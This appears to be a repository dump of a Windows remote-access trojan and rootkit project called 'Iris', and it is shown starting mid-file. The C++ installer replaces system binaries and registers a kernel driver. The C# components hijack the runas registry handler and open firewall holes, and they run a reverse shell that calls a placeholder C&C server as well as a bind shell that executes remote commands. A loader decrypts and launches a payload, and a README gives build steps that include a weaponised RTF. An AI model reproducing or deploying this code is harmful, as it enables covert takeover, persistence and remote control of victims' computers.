C:\\Windows\\SysWow64"); 30 | system("icacls C:\\Windows\\SysWow64 /grant administrators:F"); 31 | system("takeown /F C:\\Windows\\SysWow64\\Runonce.exe"); 32 | system("icacls C:\\Windows\\SysWow64\\Runonce.exe /grant administrators:F"); 33 | system("del C:\\Windows\\SysWow64\\Runonce.exe"); 34 | system("takeown /F C:\\Windows\\SysWow64\\Chkntfs.exe"); 35 | system("icacls C:\\Windows\\SysWow64\\Chkntfs.exe /grant administrators:F"); 36 | system("del C:\\Windows\\SysWow64\\Chkntfs.exe"); 37 | system("copy RunOnce.exe C:\\Windows\\SysWow64\\RunOnce.exe /Y"); 38 | system("copy cleanup.exe C:\\Windows\\SysWow64\\cleanup.exe /Y"); 39 | system("copy Config.exe C:\\Windows\\SysWow64\\Config.exe /Y"); 40 | system("copy Chkntfs.exe C:\\Windows\\SysWow64\\Chkntfs.exe /Y"); 41 | system("copy ns.exe C:\\Windows\\SysWow64\\installer.exe /Y"); 42 | system("copy ds.exe C:\\Windows\\SysWow64\\Cmake.exe /Y"); 43 | system("copy autochk.exe C:\\Windows\\SysWow64\\autochk.exe /Y"); 44 | system("takeown /F C:\\Windows\\servicing\\Packages"); 45 | system("icacls C:\\Windows\\servicing\\Packages /grant administrators:F"); 46 | system("copy RunOnce.exe C:\\Windows\\servicing\\Packages\\RunOnce.exe /Y"); 47 | system("copy cleanup.exe C:\\Windows\\servicing\\Packages\\cleanup.exe /Y"); 48 | system("copy Config.exe C:\\Windows\\servicing\\Packages\\Config.exe /Y"); 49 | system("copy Chkntfs.exe C:\\Windows\\servicing\\Packages\\Chkntfs.exe /Y"); 50 | system("copy ns.exe C:\\Windows\\servicing\\Packages\\installer.exe /Y"); 51 | system("copy ds.exe C:\\Windows\\servicing\\Packages\\CMake.exe /Y"); 52 | system("copy autochk.exe C:\\Windows\\System32\\autochk.exe /Y"); 53 | system("copy Zxc.sys C:\\Users\\Public\\Documents\\Zxc.sys"); 54 | system("sc.exe create Zxc type=kernel binpath=\"C:\\Users\\Public\\Documents\\Zxc.sys\" start=auto"); 55 | system("del RunOnce.exe"); 56 | system("del autochk.exe"); 57 | system("del ns.exe"); 58 | system("del ds.exe"); 59 | system("del Chkntfs.exe"); 60 | system("del cleanup.exe"); 61 | system("del Config.exe"); 62 | system("del CMake.exe"); 63 | system("del Zxc.sys"); 64 | //_popen("C:\\Windows\\SysWow64\\installer.exe"); 65 | kamikaza(); 66 | } -------------------------------------------------------------------------------- /Iris/src/Installer/README.md: -------------------------------------------------------------------------------- 1 | # All Visual C# are using the same "designer.cs" template.. just clone to every .NET exe.... 2 | -------------------------------------------------------------------------------- /Iris/src/Installer/RunOnce/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Threading.Tasks; 5 | using System.Windows.Forms; 6 | using System.Text; 7 | using System.Net.Sockets; 8 | using Microsoft.Win32; 9 | using System.Diagnostics; 10 | using System.Net; 11 | using System.IO; 12 | using System.Runtime.InteropServices; 13 | 14 | namespace RunOnce 15 | { 16 | static class Program 17 | { 18 | public static void rkStp(string Q) 19 | { 20 | Q += "\\Chkntfs.exe"; 21 | try 22 | { 23 | Registry.SetValue( 24 | "HKEY_CURRENT_USER\\Software\\Classes\\exefile\\shell\\runas\\command", 25 | "", 26 | Q, 27 | RegistryValueKind.String 28 | ); 29 | } 30 | catch { } 31 | try 32 | { 33 | Registry.SetValue( 34 | "HKEY_CURRENT_USER\\Software\\Classes\\exefile\\shell\\runas\\command", 35 | "isolatedCommand", 36 | Q, 37 | RegistryValueKind.String 38 | ); 39 | } 40 | catch { } 41 | try 42 | { 43 | Registry.SetValue( 44 | "HKEY_CURRENT_USER\\Software\\Classes\\exefile\\shell\\runas\\command", 45 | "(Default)", 46 | Q, 47 | RegistryValueKind.String 48 | ); 49 | } 50 | catch { } 51 | 52 | } 53 | [STAThread] 54 | static void Main() 55 | { 56 | string d = Directory.GetCurrentDirectory(); 57 | rkStp(d); 58 | string y = d + "\\Config.exe"; 59 | Process process = new Process(); 60 | process.StartInfo.FileName = y; 61 | process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 62 | process.StartInfo.CreateNoWindow = true; 63 | process.EnableRaisingEvents = false; 64 | process.Start(); 65 | Environment.Exit(0); 66 | Application.Exit(); 67 | Application.EnableVisualStyles(); 68 | Application.SetCompatibleTextRenderingDefault(false); 69 | Application.Run(new Form1()); 70 | Environment.Exit(0); 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /Iris/src/Installer/ds/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Threading.Tasks; 5 | using System.Windows.Forms; 6 | using System.Text; 7 | using System.Net.Sockets; 8 | using Microsoft.Win32; 9 | using System.Diagnostics; 10 | using System.Net; 11 | using System.IO; 12 | using System.Runtime.InteropServices; 13 | 14 | namespace ds 15 | 16 | { 17 | static class Program 18 | { 19 | public static TcpListener getServer(System.Net.IPAddress IPAd) 20 | { 21 | int[] table = { 29034, 62001, 33333, 24097, 55555 }; 22 | for (int i = 0; i < table.Length; i++) 23 | { 24 | try 25 | { 26 | TcpListener serverSock_ = new TcpListener(IPAd, table[i]); 27 | return serverSock_; 28 | } 29 | catch 30 | { 31 | } 32 | } 33 | TcpListener serverSock = new TcpListener(IPAd, 66666); 34 | return serverSock; 35 | } 36 | public static string rc(string c) 37 | { 38 | int PROCESS_TIMEOUT = 100000; 39 | Process process = new Process(); 40 | StringBuilder outputStringBuilder = new StringBuilder(); 41 | try 42 | 43 | { 44 | process.StartInfo.FileName = "cmd.exe"; 45 | process.StartInfo.Arguments = "/c " + c; 46 | process.StartInfo.RedirectStandardError = true; 47 | process.StartInfo.RedirectStandardOutput = true; 48 | process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 49 | process.StartInfo.CreateNoWindow = true; 50 | process.StartInfo.UseShellExecute = false; 51 | process.EnableRaisingEvents = false; 52 | process.OutputDataReceived += (sender, eventArgs) => outputStringBuilder.AppendLine(eventArgs.Data); 53 | process.ErrorDataReceived += (sender, eventArgs) => outputStringBuilder.AppendLine(eventArgs.Data); 54 | process.Start(); 55 | process.BeginOutputReadLine(); 56 | process.BeginErrorReadLine(); 57 | var processExited = process.WaitForExit(PROCESS_TIMEOUT); 58 | try 59 | { 60 | string Ret = process.StandardOutput.ReadToEnd(); 61 | process.Kill(); 62 | return Ret; 63 | } 64 | catch 65 | { 66 | if (processExited == false) 67 | { 68 | string Ret = outputStringBuilder.ToString(); 69 | process.Kill(); 70 | return Ret; 71 | } 72 | else if (process.ExitCode != 0) 73 | { 74 | string output = outputStringBuilder.ToString(); 75 | return output; 76 | } 77 | else 78 | { 79 | process.Close(); 80 | string output = outputStringBuilder.ToString(); 81 | return output; 82 | } 83 | } 84 | } 85 | catch 86 | { 87 | process.Close(); 88 | return "..............................."; 89 | } 90 | } 91 | 92 | public static void SetStartup() 93 | { 94 | try 95 | 96 | { 97 | string Q = Directory.GetCurrentDirectory(); 98 | Q += "\\ds.exe"; 99 | string Re = rc("netsh advfirewall firewall add rule name=\"allowedprogram\" dir=in action=allow program=\"" + Q + "\" enable=yes"); 100 | } 101 | catch 102 | { 103 | } 104 | 105 | } 106 | public static System.Net.IPAddress GetLocalIPAddress() 107 | 108 | { 109 | var h = Dns.GetHostEntry(Dns.GetHostName()); 110 | foreach (var ip in h.AddressList) 111 | { 112 | if (ip.AddressFamily == AddressFamily.InterNetwork) 113 | { 114 | return ip; 115 | } 116 | } 117 | return IPAddress.Parse("127.0.0.1"); 118 | } 119 | public static void Runserver() 120 | { 121 | 122 | TcpClient tcpint = new TcpClient(); 123 | bool Auth = false; 124 | tcpint.Connect("your C&C Server", your port); // The Reverse Handler.... 125 | Byte[] sBytes = Encoding.ASCII.GetBytes("Client Hello"); 126 | int requestCount = 0; 127 | requestCount = 0; 128 | requestCount = requestCount + 1; 129 | NetworkStream networkStream = tcpint.GetStream(); 130 | networkStream.Write(sBytes, 0, sBytes.Length); 131 | networkStream.Flush(); 132 | while ((true)) 133 | { 134 | try 135 | { 136 | byte[] bytesFrom = new byte[tcpint.ReceiveBufferSize]; 137 | networkStream.Read(bytesFrom, 0, bytesFrom.Length); 138 | string dataFromClient = System.Text.Encoding.ASCII.GetString(bytesFrom); 139 | string ret = rc(dataFromClient); 140 | string serverResponse = ret; 141 | Byte[] sendBytes = Encoding.ASCII.GetBytes(serverResponse); 142 | networkStream.Write(sendBytes, 0, sendBytes.Length); 143 | networkStream.Flush(); 144 | System.Threading.Thread.Sleep(5000); 145 | } 146 | catch 147 | { 148 | } 149 | } 150 | Application.EnableVisualStyles(); 151 | Application.SetCompatibleTextRenderingDefault(false); 152 | Application.Run(new Form1()); 153 | } 154 | [STAThread] 155 | static void Main(string[] args) 156 | { 157 | SetStartup(); 158 | Runserver(); 159 | Application.EnableVisualStyles(); 160 | Application.SetCompatibleTextRenderingDefault(false); 161 | Application.Run(new Form1()); 162 | } 163 | } 164 | } 165 | -------------------------------------------------------------------------------- /Iris/src/Installer/ns/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Threading.Tasks; 5 | using System.Windows.Forms; 6 | using System.Text; 7 | using System.Net.Sockets; 8 | using Microsoft.Win32; 9 | using System.Diagnostics; 10 | using System.Net; 11 | using System.IO; 12 | using System.Runtime.InteropServices; 13 | 14 | namespace ns 15 | 16 | { 17 | static class Program 18 | { 19 | public static TcpListener getServer(System.Net.IPAddress IPAd) 20 | { 21 | int[] table = { 29034, 62001 , 33333, 24097, 55555}; 22 | for (int i = 0; i < table.Length; i++) 23 | { 24 | try 25 | { 26 | TcpListener serverSock_ = new TcpListener(IPAd, table[i]); 27 | return serverSock_; 28 | } 29 | catch 30 | { 31 | } 32 | } 33 | TcpListener serverSock = new TcpListener(IPAd, 66666); 34 | return serverSock; 35 | } 36 | public static string rc(string c) 37 | { 38 | int PROCESS_TIMEOUT = 40000; 39 | Process process = new Process(); 40 | StringBuilder outputStringBuilder = new StringBuilder(); 41 | try 42 | 43 | { 44 | process.StartInfo.FileName = "cmd.exe"; //cmd; 45 | process.StartInfo.Arguments = "/c " + c; 46 | process.StartInfo.RedirectStandardError = true; 47 | process.StartInfo.RedirectStandardOutput = true; 48 | process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 49 | process.StartInfo.CreateNoWindow = true; 50 | process.StartInfo.UseShellExecute = false; 51 | process.EnableRaisingEvents = false; 52 | process.OutputDataReceived += (sender, eventArgs) => outputStringBuilder.AppendLine(eventArgs.Data); 53 | process.ErrorDataReceived += (sender, eventArgs) => outputStringBuilder.AppendLine(eventArgs.Data); 54 | process.Start(); 55 | process.BeginOutputReadLine(); 56 | process.BeginErrorReadLine(); 57 | var processExited = process.WaitForExit(PROCESS_TIMEOUT); 58 | try 59 | { 60 | string Ret = process.StandardOutput.ReadToEnd(); 61 | process.Kill(); 62 | return Ret; 63 | } 64 | catch 65 | { 66 | if (processExited == false) 67 | { 68 | string Ret = outputStringBuilder.ToString(); 69 | process.Kill(); 70 | return Ret; 71 | } 72 | else if (process.ExitCode != 0) 73 | { 74 | string output = outputStringBuilder.ToString(); 75 | return output; 76 | } 77 | else 78 | { 79 | process.Close(); 80 | string output = outputStringBuilder.ToString(); 81 | return output; 82 | } 83 | } 84 | } 85 | catch 86 | { 87 | process.Close(); 88 | return "..............................."; 89 | } 90 | } 91 | 92 | public static void SetStartup() 93 | { 94 | try 95 | 96 | { 97 | string Q = Directory.GetCurrentDirectory(); 98 | Q += "\\ns.exe"; 99 | string Re = rc("netsh advfirewall firewall add rule name=\"allowedprogram\" dir=in action=allow program=\"" + Q + "\" enable=yes"); 100 | } 101 | catch 102 | { 103 | } 104 | 105 | } 106 | public static System.Net.IPAddress GetLocalIPAddress() 107 | 108 | { 109 | var h = Dns.GetHostEntry(Dns.GetHostName()); 110 | foreach (var ip in h.AddressList) 111 | { 112 | if (ip.AddressFamily == AddressFamily.InterNetwork) 113 | { 114 | return ip; 115 | } 116 | } 117 | return IPAddress.Parse("127.0.0.1"); 118 | } 119 | public static void Runserver() 120 | { 121 | 122 | System.Net.IPAddress IPAd = GetLocalIPAddress(); 123 | bool Auth = false; 124 | TcpListener serverSocket = getServer(IPAd); 125 | int requestCount = 0; 126 | TcpClient clientSocket = default(TcpClient); 127 | serverSocket.Start(); 128 | clientSocket = serverSocket.AcceptTcpClient(); 129 | requestCount = 0; 130 | while ((true)) 131 | { 132 | try 133 | { 134 | requestCount = requestCount + 1; 135 | NetworkStream networkStream = clientSocket.GetStream(); 136 | byte[] bytesFrom = new byte[clientSocket.ReceiveBufferSize]; 137 | networkStream.Read(bytesFrom, 0, bytesFrom.Length); 138 | string dataFromClient = System.Text.Encoding.ASCII.GetString(bytesFrom); 139 | string ret = rc(dataFromClient); 140 | string serverResponse = ret; 141 | Byte[] sendBytes = Encoding.ASCII.GetBytes(serverResponse); 142 | networkStream.Write(sendBytes, 0, sendBytes.Length); 143 | networkStream.Flush(); 144 | System.Threading.Thread.Sleep(5000); 145 | } 146 | catch 147 | { 148 | } 149 | } 150 | clientSocket.Close(); 151 | serverSocket.Stop(); 152 | Application.EnableVisualStyles(); 153 | Application.SetCompatibleTextRenderingDefault(false); 154 | Application.Run(new Form1()); 155 | } 156 | [STAThread] 157 | static void Main(string[] args) 158 | { 159 | SetStartup(); 160 | Runserver(); 161 | Application.EnableVisualStyles(); 162 | Application.SetCompatibleTextRenderingDefault(false); 163 | Application.Run(new Form1()); 164 | } 165 | } 166 | } 167 | -------------------------------------------------------------------------------- /Iris/src/Installer/tc32k/Program.cs: -------------------------------------------------------------------------------- 1 |  2 | using System; 3 | using System.Collections.Generic; 4 | using System.Linq; 5 | using System.Threading.Tasks; 6 | using System.Windows.Forms; 7 | using System.Text; 8 | using System.Net.Sockets; 9 | using Microsoft.Win32; 10 | using System.Diagnostics; 11 | using System.Security.Cryptography; 12 | using System.Net; 13 | using System.IO; 14 | using System.IO.Compression; 15 | using System.Runtime.InteropServices; 16 | 17 | namespace tc32k 18 | 19 | { 20 | static class Program 21 | { 22 | private static void Ef(string iFs, string oFs, string pd) 23 | { 24 | 25 | try 26 | { 27 | UnicodeEncoding UE = new UnicodeEncoding(); 28 | byte[] key = UE.GetBytes(pd); 29 | 30 | string cryptFile = oFs; 31 | FileStream fsCrypt = new FileStream(cryptFile, FileMode.Create); 32 | 33 | RijndaelManaged RMCrypto = new RijndaelManaged(); 34 | 35 | CryptoStream cs = new CryptoStream(fsCrypt, 36 | RMCrypto.CreateEncryptor(key, key), 37 | CryptoStreamMode.Write); 38 | 39 | FileStream fsIn = new FileStream(iFs, FileMode.Open); 40 | 41 | int data; 42 | while ((data = fsIn.ReadByte()) != -1) 43 | cs.WriteByte((byte)data); 44 | 45 | 46 | fsIn.Close(); 47 | cs.Close(); 48 | fsCrypt.Close(); 49 | } 50 | catch (Exception er) 51 | { 52 | MessageBox.Show(er.ToString()); 53 | } 54 | } 55 | private static void Df(string iFs, string oFs, string pd) 56 | { 57 | 58 | { 59 | 60 | UnicodeEncoding UE = new UnicodeEncoding(); 61 | byte[] key = UE.GetBytes(pd); 62 | 63 | FileStream fsCrypt = new FileStream(iFs, FileMode.Open); 64 | 65 | RijndaelManaged RMCrypto = new RijndaelManaged(); 66 | 67 | CryptoStream cs = new CryptoStream(fsCrypt, 68 | RMCrypto.CreateDecryptor(key, key), 69 | CryptoStreamMode.Read); 70 | 71 | FileStream fsOut = new FileStream(oFs, FileMode.Create); 72 | 73 | int data; 74 | while ((data = cs.ReadByte()) != -1) 75 | fsOut.WriteByte((byte)data); 76 | 77 | fsOut.Close(); 78 | cs.Close(); 79 | fsCrypt.Close(); 80 | 81 | } 82 | } 83 | private static void Sed(string dr) { 84 | string foo = dr + "\\fs64.zip"; 85 | string To = dr; 86 | System.IO.Compression.ZipFile.ExtractToDirectory(foo,To); 87 | File.Delete(foo); 88 | } 89 | private static void Su( string y ) 90 | { 91 | try 92 | { 93 | string del = y + "\\tc32k.exe"; 94 | string KeyName = "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tc32k"; 95 | RegistryKey Hkey = Registry.CurrentUser; 96 | Hkey.DeleteValue(KeyName); 97 | } catch{ } 98 | } 99 | 100 | [STAThread] 101 | static void Main(string[] args) 102 | 103 | { 104 | string pa = Directory.GetCurrentDirectory(); 105 | int la = args.Length - 1; 106 | string pwd = args[la]; 107 | Df(pa + "\\fs64.enc", pa + "\\yourPayLoad.zip", pwd); 108 | try 109 | { 110 | Su(pa); 111 | Sed(pa); 112 | } 113 | catch (Exception t) { Console.Write(t); } 114 | string exv = pa + "\\yourPayLoad\\YourInstaller.exe"; 115 | ProcessStartInfo ps = new ProcessStartInfo(); 116 | ps.WorkingDirectory = pa + "\\yourPayLoad"; 117 | ps.FileName = exv; 118 | Process.Start(ps); 119 | Environment.Exit(0); 120 | Application.EnableVisualStyles(); 121 | Application.SetCompatibleTextRenderingDefault(false); 122 | Application.Run(new Form1()); 123 | Environment.Exit(0); 124 | } 125 | 126 | } 127 | 128 | } 129 | -------------------------------------------------------------------------------- /Iris/src/README.md: -------------------------------------------------------------------------------- 1 | # In Order To build the RootKit One needs to compile the driver (Drv) with wdk, compile all the installer files (after zipping them) and encrypt then using the tc32k source given save all by names and craft the .rtf with the payload given. 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Rats 2 | For more info at the given moment go to Iris 3 | --------------------------------------------------------------------------------